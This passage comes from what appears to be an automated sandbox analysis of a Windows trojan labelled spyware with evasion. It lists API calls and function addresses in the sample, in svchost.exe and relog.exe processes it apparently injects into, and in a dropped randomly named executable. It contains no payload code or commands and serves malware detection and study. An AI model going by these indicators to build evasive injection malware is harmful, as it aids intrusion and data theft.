                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672C00 NtQueryInformationProcess,6_2_03672C00
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672CF0 NtOpenProcess,6_2_03672CF0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672CC0 NtQueryVirtualMemory,6_2_03672CC0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03673010 NtOpenDirectoryObject,6_2_03673010
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03673090 NtSetValueKey,6_2_03673090
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03673D70 NtOpenThread,6_2_03673D70
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03673D10 NtOpenProcessToken,6_2_03673D10
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF9220 NtClose,6_2_02EF9220
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF9380 NtAllocateVirtualMemory,6_2_02EF9380
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF9080 NtReadFile,6_2_02EF9080
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF9170 NtDeleteFile,6_2_02EF9170
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EF8F10 NtCreateFile,6_2_02EF8F10
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350F7D8 NtClose,6_2_0350F7D8
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_005FD5EB
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005F1201
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005FE8F6
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0059BF400_2_0059BF40
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006020460_2_00602046
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005980600_2_00598060
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F82980_2_005F8298
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005CE4FF0_2_005CE4FF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005C676B0_2_005C676B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006248730_2_00624873
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0059CAF00_2_0059CAF0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005BCAA00_2_005BCAA0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005ACC390_2_005ACC39
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005C6DD90_2_005C6DD9
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005AB1190_2_005AB119
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005991C00_2_005991C0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B13940_2_005B1394
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B17060_2_005B1706
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B781B0_2_005B781B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005A997D0_2_005A997D
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005979200_2_00597920
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B19B00_2_005B19B0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B7A4A0_2_005B7A4A
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B1C770_2_005B1C77
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B7CA70_2_005B7CA7
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0061BE440_2_0061BE44
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005C9EEE0_2_005C9EEE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B1F320_2_005B1F32
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0165CFF00_2_0165CFF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183931_2_00418393
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010B11_2_004010B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EAE31_2_0042EAE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FB931_2_0040FB93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023991_2_00402399
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023A01_2_004023A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165931_2_00416593
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DD931_2_0040DD93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDB31_2_0040FDB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DEDF1_2_0040DEDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026E01_2_004026E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DEE31_2_0040DEE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FE01_2_00402FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B630EA5_2_03B630EA
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B632885_2_03B63288
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B6B9385_2_03B6B938
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B651585_2_03B65158
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B64F385_2_03B64F38
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeCode function: 5_2_03B83E885_2_03B83E88
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FA3526_2_036FA352
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0364E3F06_2_0364E3F0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_037003E66_2_037003E6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E02746_2_036E0274
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036C02C06_2_036C02C0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036C81586_2_036C8158
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036301006_2_03630100
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036DA1186_2_036DA118
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F81CC6_2_036F81CC
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_037001AA6_2_037001AA
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036D20006_2_036D2000
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036407706_2_03640770
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036647506_2_03664750
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0363C7C06_2_0363C7C0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365C6E06_2_0365C6E0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036405356_2_03640535
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_037005916_2_03700591
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F24466_2_036F2446
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E44206_2_036E4420
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036EE4F66_2_036EE4F6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FAB406_2_036FAB40
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F6BD76_2_036F6BD7
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0363EA806_2_0363EA80
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036569626_2_03656962
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036429A06_2_036429A0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0370A9A66_2_0370A9A6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0364A8406_2_0364A840
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036428406_2_03642840
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0366E8F06_2_0366E8F0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036268B86_2_036268B8
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036B4F406_2_036B4F40
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03682F286_2_03682F28
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03660F306_2_03660F30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E2F306_2_036E2F30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03632FC86_2_03632FC8
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036BEFA06_2_036BEFA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03640E596_2_03640E59
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FEE266_2_036FEE26
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FEEDB6_2_036FEEDB
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03652E906_2_03652E90
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FCE936_2_036FCE93
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0364AD006_2_0364AD00
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036DCD1F6_2_036DCD1F
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0363ADE06_2_0363ADE0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03658DBF6_2_03658DBF
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03640C006_2_03640C00
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03630CF26_2_03630CF2
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E0CB56_2_036E0CB5
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0362D34C6_2_0362D34C
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F132D6_2_036F132D
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0368739A6_2_0368739A
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E12ED6_2_036E12ED
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365D2F06_2_0365D2F0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365B2C06_2_0365B2C0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036452A06_2_036452A0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0367516C6_2_0367516C
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0362F1726_2_0362F172
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0370B16B6_2_0370B16B
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0364B1B06_2_0364B1B0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F70E96_2_036F70E9
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FF0E06_2_036FF0E0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036EF0CC6_2_036EF0CC
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036470C06_2_036470C0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FF7B06_2_036FF7B0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F16CC6_2_036F16CC
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F75716_2_036F7571
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036DD5B06_2_036DD5B0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036314606_2_03631460
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FF43F6_2_036FF43F
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FFB766_2_036FFB76
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036B5BF06_2_036B5BF0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0367DBF96_2_0367DBF9
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365FB806_2_0365FB80
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036B3A6C6_2_036B3A6C
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FFA496_2_036FFA49
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F7A466_2_036F7A46
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036EDAC66_2_036EDAC6
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036DDAAC6_2_036DDAAC
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03685AA06_2_03685AA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036E1AA36_2_036E1AA3
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036499506_2_03649950
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365B9506_2_0365B950
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036D59106_2_036D5910
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036AD8006_2_036AD800
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036438E06_2_036438E0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FFF096_2_036FFF09
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FFFB16_2_036FFFB1
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03641F926_2_03641F92
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03649EB06_2_03649EB0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F7D736_2_036F7D73
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03643D406_2_03643D40
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036F1D5A6_2_036F1D5A
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0365FDC06_2_0365FDC0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036B9C326_2_036B9C32
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036FFCF26_2_036FFCF2
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE1A306_2_02EE1A30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE33106_2_02EE3310
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EE51106_2_02EE5110
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDCB306_2_02EDCB30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDAB106_2_02EDAB10
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EFB8606_2_02EFB860
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDC9106_2_02EDC910
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDAC606_2_02EDAC60
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EDAC5C6_2_02EDAC5C
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350E2636_2_0350E263
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350E1446_2_0350E144
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350D6C86_2_0350D6C8
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350E5FC6_2_0350E5FC
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_0350C9786_2_0350C978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 107 times
                Source: C:\Windows\SysWOW64\relog.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\relog.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\relog.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\relog.exeCode function: String function: 0362B970 appears 260 times
                Source: C:\Windows\SysWOW64\relog.exeCode function: String function: 03687E54 appears 99 times
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: String function: 005AF9F2 appears 31 times
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: String function: 005B0A30 appears 46 times
                Source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000046ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BDlwy8b7Km.exe
                Source: BDlwy8b7Km.exe, 00000000.00000003.1728666356.0000000004543000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BDlwy8b7Km.exe
                Source: BDlwy8b7Km.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/5
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006037B5 GetLastError,FormatMessageW,0_2_006037B5
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F10BF AdjustTokenPrivileges,CloseHandle,0_2_005F10BF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005F16C3
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006051CD
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0061A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0061A67C
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0060648E
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005942A2
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeFile created: C:\Users\user\AppData\Local\Temp\autB67F.tmpJump to behavior
                Source: BDlwy8b7Km.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
